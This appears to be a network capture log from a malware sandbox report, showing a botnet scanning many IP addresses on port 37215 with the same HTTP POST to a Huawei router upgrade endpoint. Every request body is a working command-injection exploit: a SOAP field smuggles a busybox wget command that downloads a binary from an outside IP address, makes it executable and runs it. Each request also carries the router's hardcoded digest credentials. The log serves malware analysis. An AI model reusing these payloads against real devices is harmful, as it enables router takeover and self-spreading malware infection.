                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1381192.168.2.2354794157.22.225.18837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341013908 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1382192.168.2.2356136157.112.193.2237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341021061 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1383192.168.2.235464841.14.53.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341053009 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1384192.168.2.2351334197.47.244.10137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341126919 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1385192.168.2.2345322157.253.20.7937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341141939 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1386192.168.2.233566641.207.135.6637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341166019 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1387192.168.2.2338350157.131.236.11537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341183901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1388192.168.2.2343488197.247.77.5737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341228962 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1389192.168.2.2339726157.7.230.21137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341243029 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1390192.168.2.234463041.107.76.6837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341244936 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1391192.168.2.2356214197.124.237.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:58.341296911 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
